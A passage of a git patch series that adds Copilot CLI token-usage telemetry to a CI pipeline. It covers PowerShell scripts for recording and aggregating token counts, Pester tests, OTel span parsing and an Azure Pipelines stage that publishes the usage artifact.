Yellow + } +} + # ─── Helper: Invoke Copilot ────────────────────────────────────────────────── function Invoke-CopilotStep { param([string]$StepName, [string]$Prompt) @@ -599,12 +843,15 @@ function Invoke-CopilotStep { return 0 } + $startedAtUtc = [DateTimeOffset]::UtcNow $stopwatch = [System.Diagnostics.Stopwatch]::StartNew() $toolCount = 0 $turnCount = 0 $currentIntent = "" $modelName = "" $failedTools = @() + $resultEventSeen = $false + $resultUsage = $null # Tool icon mapping for common tools $toolIcons = @{ @@ -623,6 +870,9 @@ function Invoke-CopilotStep { # Model is overridable via $env:COPILOT_REVIEW_MODEL so contributors without internal-model access # can run this script (e.g., with 'claude-opus-4.6' or 'claude-sonnet-4.6'). $copilotModel = if ($env:COPILOT_REVIEW_MODEL) { $env:COPILOT_REVIEW_MODEL } else { 'gpt-5.5' } + if ([string]::IsNullOrWhiteSpace($modelName)) { + $modelName = $copilotModel + } & copilot -p $Prompt --allow-all --output-format json --model $copilotModel --secret-env-vars=GH_TOKEN,COPILOT_GITHUB_TOKEN,GITHUB_TOKEN 2>&1 | ForEach-Object { $line = $_.ToString() try { @@ -717,7 +967,9 @@ function Invoke-CopilotStep { } 'result' { # Final stats — note: 'result' is a top-level event with no 'data' wrapper. + $resultEventSeen = $true $usage = $event.usage + $resultUsage = $usage if ($usage) { $elapsed = $stopwatch.Elapsed.ToString("mm\:ss") $apiMs = if ($usage.totalApiDurationMs) { [math]::Round($usage.totalApiDurationMs / 1000, 1) } else { "?" } @@ -750,6 +1002,24 @@ function Invoke-CopilotStep { } $exitCode = $LASTEXITCODE $stopwatch.Stop() + $endedAtUtc = [DateTimeOffset]::UtcNow + + $usageRecord = New-CopilotTokenUsageRecord ` + -PRNumber $PRNumber ` + -Platform $Platform ` + -Phase $Phase ` + -StepName $StepName ` + -ModelName $modelName ` + -StartedAtUtc $startedAtUtc ` + -EndedAtUtc $endedAtUtc ` + -DurationMs $stopwatch.ElapsedMilliseconds ` + -TurnCount $turnCount ` + -ToolCount $toolCount ` + -FailedToolCount (@($failedTools).Count) ` + -Usage $resultUsage ` + -ResultEventSeen $resultEventSeen ` + -ExitCode $exitCode + Write-CopilotTokenUsageRecord -OutputDir $TokenUsageOutputDir -Record $usageRecord if ($exitCode -eq 0) { Write-Host " ✅ $StepName completed" -ForegroundColor Green diff --git a/.github/scripts/shared/Aggregate-CopilotTokenUsage.ps1 b/.github/scripts/shared/Aggregate-CopilotTokenUsage.ps1 new file mode 100644 index 000000000000..6b3d8355a3e1 --- /dev/null +++ b/.github/scripts/shared/Aggregate-CopilotTokenUsage.ps1 @@ -0,0 +1,355 @@ +#!/usr/bin/env pwsh +<# +.SYNOPSIS + Aggregates Copilot CLI usage telemetry into publishable artifacts. + +.DESCRIPTION + Reads raw telemetry records emitted by Review-PR.ps1 and writes JSON, + Markdown, CSV, and JSONL summaries. Missing input is treated as a valid + no-usage report so the publishing stage can still produce artifacts after + partial pipeline failures. +#> + +[CmdletBinding()] +param( + [Parameter(Mandatory = $true)] + [string]$InputRoot, + + [Parameter(Mandatory = $true)] + [string]$OutputDir, + + [Parameter(Mandatory = $false)] + [string]$PRNumber, + + [Parameter(Mandatory = $false)] + [string[]]$ExpectedStages = @( + 'ReviewPR', + 'RunDeepUITests', + 'UpdateAISummaryComment', + 'AnalyzeCopilotTokenUsage' + ) +) + +$ErrorActionPreference = 'Stop' + +function Get-ObjectMemberValue { + param( + [object]$InputObject, + [string[]]$Names + ) + + if ($null -eq $InputObject) { return $null } + + foreach ($name in $Names) { + if ($InputObject -is [System.Collections.IDictionary] -and $InputObject.Contains($name)) { + return $InputObject[$name] + } + + $property = $InputObject.PSObject.Properties[$name] + if ($property) { + return $property.Value + } + } + + return $null +} + +function Get-NestedValue { + param( + [object]$InputObject, + [string[]]$Path + ) + + $current = $InputObject + foreach ($segment in $Path) { + $current = Get-ObjectMemberValue -InputObject $current -Names @($segment) + if ($null -eq $current) { return $null } + } + + return $current +} + +function Get-NumericOrNull { + param([object]$Value) + + if ($null -eq $Value) { return $null } + if ($Value -is [byte] -or + $Value -is [sbyte] -or + $Value -is [int16] -or + $Value -is [uint16] -or + $Value -is [int] -or + $Value -is [uint32] -or + $Value -is [long] -or + $Value -is [uint64] -or + $Value -is [float] -or + $Value -is [double] -or + $Value -is [decimal]) { + return [double]$Value + } + + $parsed = 0.0 + if ([double]::TryParse([string]$Value, [ref]$parsed)) { + return $parsed + } + + return $null +} + +function Get-NullableSum { + param([object[]]$Values) + + $hasValue = $false + $sum = 0.0 + foreach ($value in @($Values)) { + $numeric = Get-NumericOrNull -Value $value + if ($null -ne $numeric) { + $hasValue = $true + $sum += $numeric + } + } + + if (-not $hasValue) { return $null } + return [long][Math]::Round($sum) +} + +function Get-RecordStageName { + param([object]$Record) + + $stageName = [string](Get-NestedValue -InputObject $Record -Path @('pipeline', 'stageName')) + if ([string]::IsNullOrWhiteSpace($stageName)) { + return 'ReviewPR' + } + + return $stageName +} + +function Get-RecordTokenValue { + param( + [object]$Record, + [string]$Name + ) + + return Get-NestedValue -InputObject $Record -Path @('normalizedTokens', $Name) +} + +function Read-CopilotTokenUsageRecords { + param([string]$Root) + + $records = New-Object System.Collections.ArrayList + if ([string]::IsNullOrWhiteSpace($Root) -or -not (Test-Path $Root)) { + return @() + } + + $files = Get-ChildItem -Path $Root -Recurse -File -Filter 'copilot-token-usage-*.json' -ErrorAction SilentlyContinue | + Sort-Object FullName + + foreach ($file in @($files)) { + try { + $record = Get-Content -Path $file.FullName -Raw -Encoding UTF8 | ConvertFrom-Json -ErrorAction Stop + $record | Add-Member -NotePropertyName sourceFile -NotePropertyValue $file.FullName -Force + [void]$records.Add($record) + } catch { + Write-Warning "Skipping malformed token usage record '$($file.FullName)': $_" + } + } + + return @($records.ToArray()) +} + +function New-StageSummaryRows { + param( + [object[]]$Records, + [string[]]$ExpectedStages + ) + + $stageNames = New-Object System.Collections.ArrayList + foreach ($stage in @($ExpectedStages)) { + if (-not [string]::IsNullOrWhiteSpace($stage) -and -not $stageNames.Contains($stage)) { + [void]$stageNames.Add($stage) + } + } + + foreach ($record in @($Records)) { + $stage = Get-RecordStageName -Record $record + if (-not $stageNames.Contains($stage)) { + [void]$stageNames.Add($stage) + } + } + + $rows = New-Object System.Collections.ArrayList + foreach ($stage in @($stageNames.ToArray())) { + $stageRecords = @($Records | Where-Object { (Get-RecordStageName -Record $_) -eq $stage }) + $hasRecords = $stageRecords.Count -gt 0 + [void]$rows.Add([pscustomobject][ordered]@{ + stageName = $stage + invocationCount = $stageRecords.Count + inputTokens = if ($hasRecords) { Get-NullableSum -Values @($stageRecords | ForEach-Object { Get-RecordTokenValue -Record $_ -Name 'inputTokens' }) } else { 0 } + outputTokens = if ($hasRecords) { Get-NullableSum -Values @($stageRecords | ForEach-Object { Get-RecordTokenValue -Record $_ -Name 'outputTokens' }) } else { 0 } + cachedInputTokens = if ($hasRecords) { Get-NullableSum -Values @($stageRecords | ForEach-Object { Get-RecordTokenValue -Record $_ -Name 'cachedInputTokens' }) } else { 0 } + totalTokens = if ($hasRecords) { Get-NullableSum -Values @($stageRecords | ForEach-Object { Get-RecordTokenValue -Record $_ -Name 'totalTokens' }) } else { 0 } + durationMs = if ($hasRecords) { Get-NullableSum -Values @($stageRecords | ForEach-Object { $_.durationMs }) } else { 0 } + apiDurationMs = if ($hasRecords) { Get-NullableSum -Values @($stageRecords | ForEach-Object { $_.apiDurationMs }) } else { 0 } + turnCount = if ($hasRecords) { Get-NullableSum -Values @($stageRecords | ForEach-Object { $_.turnCount }) } else { 0 } + toolCount = if ($hasRecords) { Get-NullableSum -Values @($stageRecords | ForEach-Object { $_.toolCount }) } else { 0 } + note = if ($hasRecords) { '' } else { 'No Copilot invocation observed in this stage.' } + }) + } + + return @($rows.ToArray()) +} + +function New-StepSummaryRows { + param([object[]]$Records) + + $groups = @{} + foreach ($record in @($Records)) { + $stage = Get-RecordStageName -Record $record + $step = [string]$record.copilotStep + $model = [string]$record.model + $key = "$stage|$step|$model" + if (-not $groups.ContainsKey($key)) { + $groups[$key] = New-Object System.Collections.ArrayList + } + [void]$groups[$key].Add($record) + } + + $rows = New-Object System.Collections.ArrayList + foreach ($key in ($groups.Keys | Sort-Object)) { + $items = @($groups[$key].ToArray()) + $first = $items[0] + [void]$rows.Add([pscustomobject][ordered]@{ + stageName = Get-RecordStageName -Record $first + scriptPhase = [string]$first.scriptPhase + copilotStep = [string]$first.copilotStep + model = [string]$first.model + invocationCount = $items.Count + inputTokens = Get-NullableSum -Values @($items | ForEach-Object { Get-RecordTokenValue -Record $_ -Name 'inputTokens' }) + outputTokens = Get-NullableSum -Values @($items | ForEach-Object { Get-RecordTokenValue -Record $_ -Name 'outputTokens' }) + totalTokens = Get-NullableSum -Values @($items | ForEach-Object { Get-RecordTokenValue -Record $_ -Name 'totalTokens' }) + durationMs = Get-NullableSum -Values @($items | ForEach-Object { $_.durationMs }) + apiDurationMs = Get-NullableSum -Values @($items | ForEach-Object { $_.apiDurationMs }) + turnCount = Get-NullableSum -Values @($items | ForEach-Object { $_.turnCount }) + toolCount = Get-NullableSum -Values @($items | ForEach-Object { $_.toolCount }) + }) + } + + return @($rows.ToArray()) +} + +function New-CopilotTokenUsageSummary { + param( + [object[]]$Records, + [string[]]$ExpectedStages, + [string]$PRNumber + ) + + $stageRows = @(New-StageSummaryRows -Records $Records -ExpectedStages $ExpectedStages) + $stepRows = @(New-StepSummaryRows -Records $Records) + + return [ordered]@{ + schemaVersion = 1 + generatedAtUtc = ([DateTimeOffset]::UtcNow).ToString('o') + prNumber = $PRNumber + costEstimateAvailable = $false + costEstimateNote = 'Dollar cost not calculated; no trusted rate table configured.' + recordCount = @($Records).Count + expectedStages = @($ExpectedStages) + totals = [ordered]@{ + invocationCount = @($Records).Count + inputTokens = Get-NullableSum -Values @($Records | ForEach-Object { Get-RecordTokenValue -Record $_ -Name 'inputTokens' }) + outputTokens = Get-NullableSum -Values @($Records | ForEach-Object { Get-RecordTokenValue -Record $_ -Name 'outputTokens' }) + cachedInputTokens = Get-NullableSum -Values @($Records | ForEach-Object { Get-RecordTokenValue -Record $_ -Name 'cachedInputTokens' }) + totalTokens = Get-NullableSum -Values @($Records | ForEach-Object { Get-RecordTokenValue -Record $_ -Name 'totalTokens' }) + durationMs = Get-NullableSum -Values @($Records | ForEach-Object { $_.durationMs }) + apiDurationMs = Get-NullableSum -Values @($Records | ForEach-Object { $_.apiDurationMs }) + turnCount = Get-NullableSum -Values @($Records | ForEach-Object { $_.turnCount }) + toolCount = Get-NullableSum -Values @($Records | ForEach-Object { $_.toolCount }) + } + stages = @($stageRows) + steps = @($stepRows) + } +} + +function Format-UsageValue { + param([object]$Value) + + if ($null -eq $Value -or [string]::IsNullOrWhiteSpace([string]$Value)) { + return 'n/a' + } + + return [string]$Value +} + +function New-CopilotTokenUsageMarkdown { + param([object]$Summary) + + $lines = New-Object System.Collections.ArrayList + [void]$lines.Add('# Copilot token usage') + [void]$lines.Add('') + [void]$lines.Add("- PR: $(if ($Summary.prNumber) { $Summary.prNumber } else { 'n/a' })") + [void]$lines.Add("- Records: $($Summary.recordCount)") + [void]$lines.Add("- Cost estimate: not calculated (no trusted rate table configured)") + [void]$lines.Add('') + [void]$lines.Add('## Totals') + [void]$lines.Add('') + [void]$lines.Add('| Metric | Value |') + [void]$lines.Add('|---|---:|') + [void]$lines.Add("| Invocations | $($Summary.totals.invocationCount) |") + [void]$lines.Add("| Input tokens | $(Format-UsageValue $Summary.totals.inputTokens) |") + [void]$lines.Add("| Output tokens | $(Format-UsageValue $Summary.totals.outputTokens) |") + [void]$lines.Add("| Cached input tokens | $(Format-UsageValue $Summary.totals.cachedInputTokens) |") + [void]$lines.Add("| Total tokens | $(Format-UsageValue $Summary.totals.totalTokens) |") + [void]$lines.Add("| Elapsed ms | $(Format-UsageValue $Summary.totals.durationMs) |") + [void]$lines.Add("| API duration ms | $(Format-UsageValue $Summary.totals.apiDurationMs) |") + [void]$lines.Add("| Turns | $(Format-UsageValue $Summary.totals.turnCount) |") + [void]$lines.Add("| Tools | $(Format-UsageValue $Summary.totals.toolCount) |") + [void]$lines.Add('') + [void]$lines.Add('## By stage') + [void]$lines.Add('') + [void]$lines.Add('| Stage | Invocations | Input | Output | Cached input | Total | Elapsed ms | API ms | Note |') + [void]$lines.Add('|---|---:|---:|---:|---:|---:|---:|---:|---|') + foreach ($stage in @($Summary.stages)) { + [void]$lines.Add("| $($stage.stageName) | $($stage.invocationCount) | $(Format-UsageValue $stage.inputTokens) | $(Format-UsageValue $stage.outputTokens) | $(Format-UsageValue $stage.cachedInputTokens) | $(Format-UsageValue $stage.totalTokens) | $(Format-UsageValue $stage.durationMs) | $(Format-UsageValue $stage.apiDurationMs) | $($stage.note) |") + } + [void]$lines.Add('') + [void]$lines.Add('## By Copilot step') + [void]$lines.Add('') + if (@($Summary.steps).Count -eq 0) { + [void]$lines.Add('No Copilot invocations were recorded.') + } else { + [void]$lines.Add('| Stage | Phase | Step | Model | Invocations | Input | Output | Total | Elapsed ms | API ms |') + [void]$lines.Add('|---|---|---|---|---:|---:|---:|---:|---:|---:|') + foreach ($step in @($Summary.steps)) { + [void]$lines.Add("| $($step.stageName) | $($step.scriptPhase) | $($step.copilotStep) | $($step.model) | $($step.invocationCount) | $(Format-UsageValue $step.inputTokens) | $(Format-UsageValue $step.outputTokens) | $(Format-UsageValue $step.totalTokens) | $(Format-UsageValue $step.durationMs) | $(Format-UsageValue $step.apiDurationMs) |") + } + } + + return ($lines -join [Environment]::NewLine) + [Environment]::NewLine +} + +New-Item -ItemType Directory -Path $OutputDir -Force | Out-Null + +$records = @(Read-CopilotTokenUsageRecords -Root $InputRoot) +$summary = New-CopilotTokenUsageSummary -Records $records -ExpectedStages $ExpectedStages -PRNumber $PRNumber + +$rawJsonlPath = Join-Path $OutputDir 'token-usage-raw.jsonl' +if ($records.Count -gt 0) { + $records | ForEach-Object { $_ | ConvertTo-Json -Depth 50 -Compress } | + Set-Content -Path $rawJsonlPath -Encoding UTF8 +} else { + '' | Set-Content -Path $rawJsonlPath -Encoding UTF8 +} + +$summary | ConvertTo-Json -Depth 50 | Set-Content -Path (Join-Path $OutputDir 'token-usage-summary.json') -Encoding UTF8 +New-CopilotTokenUsageMarkdown -Summary $summary | Set-Content -Path (Join-Path $OutputDir 'token-usage-summary.md') -Encoding UTF8 + +$csvPath = Join-Path $OutputDir 'token-usage-by-step.csv' +if (@($summary.steps).Count -gt 0) { + @($summary.steps) | Export-Csv -Path $csvPath -NoTypeInformation -Encoding UTF8 +} else { + 'stageName,scriptPhase,copilotStep,model,invocationCount,inputTokens,outputTokens,totalTokens,durationMs,apiDurationMs,turnCount,toolCount' | + Set-Content -Path $csvPath -Encoding UTF8 +} + +Write-Host "Copilot token usage records: $($summary.recordCount)" +Write-Host "Copilot token usage artifact directory: $OutputDir" diff --git a/eng/pipelines/ci-copilot.yml b/eng/pipelines/ci-copilot.yml index 3c10c99fac72..0745323e92e1 100644 --- a/eng/pipelines/ci-copilot.yml +++ b/eng/pipelines/ci-copilot.yml @@ -614,6 +614,7 @@ stages: # Create artifacts directory mkdir -p $(Build.ArtifactStagingDirectory)/copilot-logs + mkdir -p $(Build.ArtifactStagingDirectory)/copilot-token-usage/raw # Copy trusted scripts from the checked-out commit so later tasks # (which may be on a merged/modified worktree) use the same .github/ @@ -633,6 +634,7 @@ stages: -Platform "${{ parameters.Platform }}" \ -Phase Setup \ -TrustedScriptsDir "$TRUSTED" \ + -TokenUsageOutputDir "$(Build.ArtifactStagingDirectory)/copilot-token-usage/raw" \ -LogFile "$(Build.ArtifactStagingDirectory)/copilot-logs/copilot_review_output.md" SETUP_EXIT=$? set -e @@ -663,6 +665,7 @@ stages: -Platform "${{ parameters.Platform }}" \ -Phase Gate \ -TrustedScriptsDir "$TRUSTED" \ + -TokenUsageOutputDir "$(Build.ArtifactStagingDirectory)/copilot-token-usage/raw" \ -LogFile "$(Build.ArtifactStagingDirectory)/copilot-logs/copilot_review_output.md" GATE_EXIT=$? set -e @@ -694,6 +697,7 @@ stages: -Platform "${{ parameters.Platform }}" \ -Phase CopilotReview \ -TrustedScriptsDir "$TRUSTED" \ + -TokenUsageOutputDir "$(Build.ArtifactStagingDirectory)/copilot-token-usage/raw" \ -LogFile "$(Build.ArtifactStagingDirectory)/copilot-logs/copilot_review_output.md" REVIEW_EXIT=$? set -e @@ -724,6 +728,7 @@ stages: -Platform "${{ parameters.Platform }}" \ -Phase Post \ -TrustedScriptsDir "$TRUSTED" \ + -TokenUsageOutputDir "$(Build.ArtifactStagingDirectory)/copilot-token-usage/raw" \ -LogFile "$(Build.ArtifactStagingDirectory)/copilot-logs/copilot_review_output.md" POST_EXIT=$? set -e @@ -761,6 +766,13 @@ stages: Copy-Item -Path ".github/agent-pr-session" -Destination $logsDir -Recurse -Force -ErrorAction SilentlyContinue } + # Copilot token usage raw records + $tokenUsageDir = "$(Build.ArtifactStagingDirectory)/copilot-token-usage" + if (Test-Path $tokenUsageDir) { + Write-Host "Copying copilot-token-usage..." + Copy-Item -Path $tokenUsageDir -Destination (Join-Path $logsDir "copilot-token-usage") -Recurse -Force -ErrorAction SilentlyContinue + } + # Review_Feedback files Get-ChildItem -Path . -Filter "Review_Feedback_*.md" -Recurse -ErrorAction SilentlyContinue | ForEach-Object { Copy-Item $_.FullName $logsDir -ErrorAction SilentlyContinue } @@ -1698,3 +1710,56 @@ stages: displayName: 'Post AI summary review' env: GH_TOKEN: $(GH_COMMENT_TOKEN) + + - stage: AnalyzeCopilotTokenUsage + displayName: 'Analyze Copilot token usage' + dependsOn: + - ReviewPR + - RunDeepUITests + - UpdateAISummaryComment + condition: always() + jobs: + - job: AnalyzeTokenUsage + displayName: 'Publish Copilot token usage artifact' + pool: + name: Azure Pipelines + vmImage: ubuntu-22.04 + timeoutInMinutes: 10 + steps: + - checkout: self + persistCredentials: false + + - task: DownloadPipelineArtifact@2 + displayName: 'Download CopilotLogs' + inputs: + buildType: 'current' + artifactName: 'CopilotLogs' + targetPath: '$(Pipeline.Workspace)/CopilotLogs' + continueOnError: true + + - pwsh: | + $ErrorActionPreference = 'Stop' + $inputRoot = "$(Pipeline.Workspace)/CopilotLogs" + $outputDir = "$(Build.ArtifactStagingDirectory)/copilot-token-usage" + $script = ".github/scripts/shared/Aggregate-CopilotTokenUsage.ps1" + if (-not (Test-Path $script)) { throw "$script missing" } + + & $script ` + -InputRoot $inputRoot ` + -OutputDir $outputDir ` + -PRNumber "${{ parameters.PRNumber }}" ` + -ExpectedStages @( + 'ReviewPR', + 'RunDeepUITests', + 'UpdateAISummaryComment', + 'AnalyzeCopilotTokenUsage' + ) + displayName: 'Aggregate Copilot token usage' + + - task: PublishPipelineArtifact@1 + displayName: 'Publish CopilotTokenUsage' + inputs: + targetPath: '$(Build.ArtifactStagingDirectory)/copilot-token-usage' + artifact: 'CopilotTokenUsage' + publishLocation: 'pipeline' + condition: always() From 8559242316f99021a491b91fb9af314181153c44 Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Fri, 5 Jun 2026 15:31:26 +0200 Subject: [PATCH 33/34] Capture Copilot OTel token metrics Enable the Copilot OTel file exporter per review step and merge exported token metrics into the existing CopilotTokenUsage artifact summaries. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .../Aggregate-CopilotTokenUsage.Tests.ps1 | 8 + .github/scripts/Review-PR.Tests.ps1 | 88 ++++ .github/scripts/Review-PR.ps1 | 466 ++++++++++++++---- .../shared/Aggregate-CopilotTokenUsage.ps1 | 41 +- 4 files changed, 488 insertions(+), 115 deletions(-) diff --git a/.github/scripts/Aggregate-CopilotTokenUsage.Tests.ps1 b/.github/scripts/Aggregate-CopilotTokenUsage.Tests.ps1 index f4b7138f36bb..9baf64b83113 100644 --- a/.github/scripts/Aggregate-CopilotTokenUsage.Tests.ps1 +++ b/.github/scripts/Aggregate-CopilotTokenUsage.Tests.ps1 @@ -32,6 +32,11 @@ Describe 'Aggregate-CopilotTokenUsage.ps1' { apiDurationMs = 2000 turnCount = 2 toolCount = 3 + cliUsage = [ordered]@{ + aicUsed = 7.5 + contextWindow = 1100000 + contextWindowRaw = '1.1M' + } normalizedTokens = [ordered]@{ inputTokens = 100 outputTokens = 40 @@ -56,14 +61,17 @@ Describe 'Aggregate-CopilotTokenUsage.ps1' { $summary.totals.inputTokens | Should -Be 100 $summary.totals.outputTokens | Should -Be 40 $summary.totals.totalTokens | Should -Be 140 + $summary.totals.aicUsed | Should -Be 7.5 $reviewStage = $summary.stages | Where-Object { $_.stageName -eq 'ReviewPR' } $reviewStage.invocationCount | Should -Be 1 $reviewStage.totalTokens | Should -Be 140 + $reviewStage.aicUsed | Should -Be 7.5 $deepStage = $summary.stages | Where-Object { $_.stageName -eq 'RunDeepUITests' } $deepStage.invocationCount | Should -Be 0 $deepStage.totalTokens | Should -Be 0 + $deepStage.aicUsed | Should -Be 0 $deepStage.note | Should -Be 'No Copilot invocation observed in this stage.' } diff --git a/.github/scripts/Review-PR.Tests.ps1 b/.github/scripts/Review-PR.Tests.ps1 index 934724a2e8bf..362e3e6fa788 100644 --- a/.github/scripts/Review-PR.Tests.ps1 +++ b/.github/scripts/Review-PR.Tests.ps1 @@ -47,6 +47,9 @@ BeforeAll { Invoke-Expression (Get-FunctionBody -ScriptText $content -FunctionName 'Get-CopilotUsageTokenFields') Invoke-Expression (Get-FunctionBody -ScriptText $content -FunctionName 'Get-TokenFieldSum') Invoke-Expression (Get-FunctionBody -ScriptText $content -FunctionName 'Get-CopilotTokenMetrics') + Invoke-Expression (Get-FunctionBody -ScriptText $content -FunctionName 'Convert-CopilotCompactNumber') + Invoke-Expression (Get-FunctionBody -ScriptText $content -FunctionName 'Get-CopilotCliUsageLineData') + Invoke-Expression (Get-FunctionBody -ScriptText $content -FunctionName 'Get-CopilotOtelTokenMetrics') Invoke-Expression (Get-FunctionBody -ScriptText $content -FunctionName 'New-CopilotTokenUsageRecord') } @@ -71,6 +74,44 @@ Describe 'Copilot token usage helpers' { @($metrics.rawTokenFields | Where-Object { $_.Path -eq 'nested.cachedInputTokens' }).Count | Should -Be 1 } + It 'parses Copilot CLI AIC and context footer lines' { + $aicLine = Get-CopilotCliUsageLineData -Line 'Session: 1030 AIC used' + $contextLine = Get-CopilotCliUsageLineData -Line 'GPT-5.5 • 1.1M context' + + $aicLine.aicUsed | Should -Be 1030 + $contextLine.model | Should -Be 'GPT-5.5' + $contextLine.contextWindowRaw | Should -Be '1.1M' + $contextLine.contextWindow | Should -Be 1100000 + } + + It 'reads token counts from Copilot OTel spans' { + $otelPath = Join-Path ([System.IO.Path]::GetTempPath()) "copilot-otel-$([guid]::NewGuid()).jsonl" + try { + [ordered]@{ + type = 'span' + attributes = [ordered]@{ + 'gen_ai.usage.input_tokens' = 1000 + 'gen_ai.usage.output_tokens' = 200 + 'gen_ai.usage.cache_read.input_tokens' = 800 + 'gen_ai.usage.reasoning.output_tokens' = 50 + 'github.copilot.cost' = 7.5 + } + } | ConvertTo-Json -Depth 10 -Compress | Set-Content $otelPath -Encoding UTF8 + + $metrics = Get-CopilotOtelTokenMetrics -Path $otelPath + + $metrics.available | Should -Be $true + $metrics.inputTokens | Should -Be 1000 + $metrics.outputTokens | Should -Be 200 + $metrics.cachedInputTokens | Should -Be 800 + $metrics.reasoningOutputTokens | Should -Be 50 + $metrics.totalTokens | Should -Be 1200 + $metrics.copilotCost | Should -Be 7.5 + } finally { + Remove-Item $otelPath -Force -ErrorAction SilentlyContinue + } + } + It 'builds a telemetry record with raw usage and no hardcoded cost estimate' { $usage = [pscustomobject]@{ prompt_tokens = 25 @@ -92,6 +133,10 @@ Describe 'Copilot token usage helpers' { -ToolCount 3 ` -FailedToolCount 1 ` -Usage $usage ` + -OtelMetrics $null ` + -AicUsed 1030 ` + -ContextWindow 1100000 ` + -ContextWindowRaw '1.1M' ` -ResultEventSeen $true ` -ExitCode 0 @@ -102,9 +147,52 @@ Describe 'Copilot token usage helpers' { $record.normalizedTokens.inputTokens | Should -Be 25 $record.normalizedTokens.outputTokens | Should -Be 15 $record.normalizedTokens.totalTokens | Should -Be 45 + $record.cliUsage.aicUsed | Should -Be 1030 + $record.cliUsage.contextWindow | Should -Be 1100000 + $record.cliUsage.contextWindowRaw | Should -Be '1.1M' $record.usage.total_tokens | Should -Be 45 $record.costEstimateAvailable | Should -Be $false } + + It 'uses OTel token metrics when result usage has no token fields' { + $otelMetrics = [ordered]@{ + inputTokens = 500 + outputTokens = 75 + cachedInputTokens = 400 + reasoningOutputTokens = 25 + totalTokens = 575 + copilotCost = 7.5 + file = '/tmp/copilot-otel.jsonl' + } + + $record = New-CopilotTokenUsageRecord ` + -PRNumber 35677 ` + -Platform 'android' ` + -Phase 'CopilotReview' ` + -StepName 'STEP 5a: TRY-FIX' ` + -ModelName 'gpt-5.5' ` + -StartedAtUtc ([DateTimeOffset]::Parse('2026-06-05T10:00:00Z')) ` + -EndedAtUtc ([DateTimeOffset]::Parse('2026-06-05T10:00:05Z')) ` + -DurationMs 5000 ` + -TurnCount 2 ` + -ToolCount 3 ` + -FailedToolCount 0 ` + -Usage ([pscustomobject]@{ totalApiDurationMs = 1000 }) ` + -OtelMetrics $otelMetrics ` + -AicUsed $null ` + -ContextWindow $null ` + -ContextWindowRaw $null ` + -ResultEventSeen $true ` + -ExitCode 0 + + $record.normalizedTokens.inputTokens | Should -Be 500 + $record.normalizedTokens.outputTokens | Should -Be 75 + $record.normalizedTokens.cachedInputTokens | Should -Be 400 + $record.normalizedTokens.reasoningOutputTokens | Should -Be 25 + $record.normalizedTokens.totalTokens | Should -Be 575 + $record.normalizedTokens.otelFile | Should -Be '/tmp/copilot-otel.jsonl' + $record.cliUsage.aicUsed | Should -Be 7.5 + } } Describe 'Get-TrxResults' { diff --git a/.github/scripts/Review-PR.ps1 b/.github/scripts/Review-PR.ps1 index 3c672e82d089..44632634ce58 100644 --- a/.github/scripts/Review-PR.ps1 +++ b/.github/scripts/Review-PR.ps1 @@ -746,6 +746,158 @@ function Get-CopilotTokenMetrics { } } +function Convert-CopilotCompactNumber { + param([string]$Value) + + if ([string]::IsNullOrWhiteSpace($Value)) { return $null } + + $normalized = ($Value -replace ',', '').Trim() + if ($normalized -notmatch '^(?[0-9]+(?:\.[0-9]+)?)\s*(?[KMGkmg])?$') { + return $null + } + + $number = [double]$Matches['number'] + $multiplier = switch ($Matches['suffix'].ToUpperInvariant()) { + 'K' { 1000 } + 'M' { 1000000 } + 'G' { 1000000000 } + default { 1 } + } + + return [long][Math]::Round($number * $multiplier) +} + +function Get-CopilotCliUsageLineData { + param([string]$Line) + + $data = [ordered]@{} + if ([string]::IsNullOrWhiteSpace($Line)) { + return $data + } + + if ($Line -match 'Session:\s*(?[0-9]+(?:\.[0-9]+)?)\s*AIC\s+used') { + $data.aicUsed = [double]$Matches['aic'] + } + + if ($Line -match '^\s*(?.+?)\s*[\u2022\u00b7]\s*(?[0-9][0-9,]*(?:\.[0-9]+)?\s*[KMGkmg]?)\s+context\s*$') { + $contextRaw = $Matches['context'].Trim() + $data.model = $Matches['model'].Trim() + $data.contextWindowRaw = $contextRaw + $data.contextWindow = Convert-CopilotCompactNumber -Value $contextRaw + } + + return $data +} + +function Get-CopilotOtelTokenMetrics { + param([string]$Path) + + $metrics = [ordered]@{ + inputTokens = $null + outputTokens = $null + cachedInputTokens = $null + reasoningOutputTokens = $null + totalTokens = $null + copilotCost = $null + available = $false + file = $Path + } + + if ([string]::IsNullOrWhiteSpace($Path) -or -not (Test-Path $Path)) { + return $metrics + } + + $spanSums = @{ + input = 0.0 + output = 0.0 + cached = 0.0 + reasoning = 0.0 + cost = 0.0 + } + $spanSeen = @{ + input = $false + output = $false + cached = $false + reasoning = $false + cost = $false + } + + $metricSums = @{ + input = 0.0 + output = 0.0 + cached = 0.0 + } + $metricSeen = @{ + input = $false + output = $false + cached = $false + } + + foreach ($line in Get-Content -Path $Path -Encoding UTF8) { + if ([string]::IsNullOrWhiteSpace($line)) { continue } + + try { + $entry = $line | ConvertFrom-Json -ErrorAction Stop + } catch { + continue + } + + if ($entry.type -eq 'span' -and $entry.attributes) { + $attributes = $entry.attributes + $inputValue = Get-ObjectMemberValue -InputObject $attributes -Names @('gen_ai.usage.input_tokens') + $outputValue = Get-ObjectMemberValue -InputObject $attributes -Names @('gen_ai.usage.output_tokens') + $cachedValue = Get-ObjectMemberValue -InputObject $attributes -Names @('gen_ai.usage.cache_read.input_tokens') + $reasoningValue = Get-ObjectMemberValue -InputObject $attributes -Names @('gen_ai.usage.reasoning.output_tokens') + $costValue = Get-ObjectMemberValue -InputObject $attributes -Names @('github.copilot.cost') + + if (Test-IsNumericValue $inputValue) { $spanSums.input += [double]$inputValue; $spanSeen.input = $true } + if (Test-IsNumericValue $outputValue) { $spanSums.output += [double]$outputValue; $spanSeen.output = $true } + if (Test-IsNumericValue $cachedValue) { $spanSums.cached += [double]$cachedValue; $spanSeen.cached = $true } + if (Test-IsNumericValue $reasoningValue) { $spanSums.reasoning += [double]$reasoningValue; $spanSeen.reasoning = $true } + if (Test-IsNumericValue $costValue) { $spanSums.cost += [double]$costValue; $spanSeen.cost = $true } + } elseif ($entry.type -eq 'metric' -and $entry.name -eq 'gen_ai.client.token.usage') { + foreach ($point in @($entry.dataPoints)) { + $tokenType = [string](Get-ObjectMemberValue -InputObject $point.attributes -Names @('gen_ai.token.type')) + $sumValue = Get-ObjectMemberValue -InputObject $point.value -Names @('sum') + if (-not (Test-IsNumericValue $sumValue)) { continue } + + if ($tokenType -eq 'input') { + $metricSums.input += [double]$sumValue + $metricSeen.input = $true 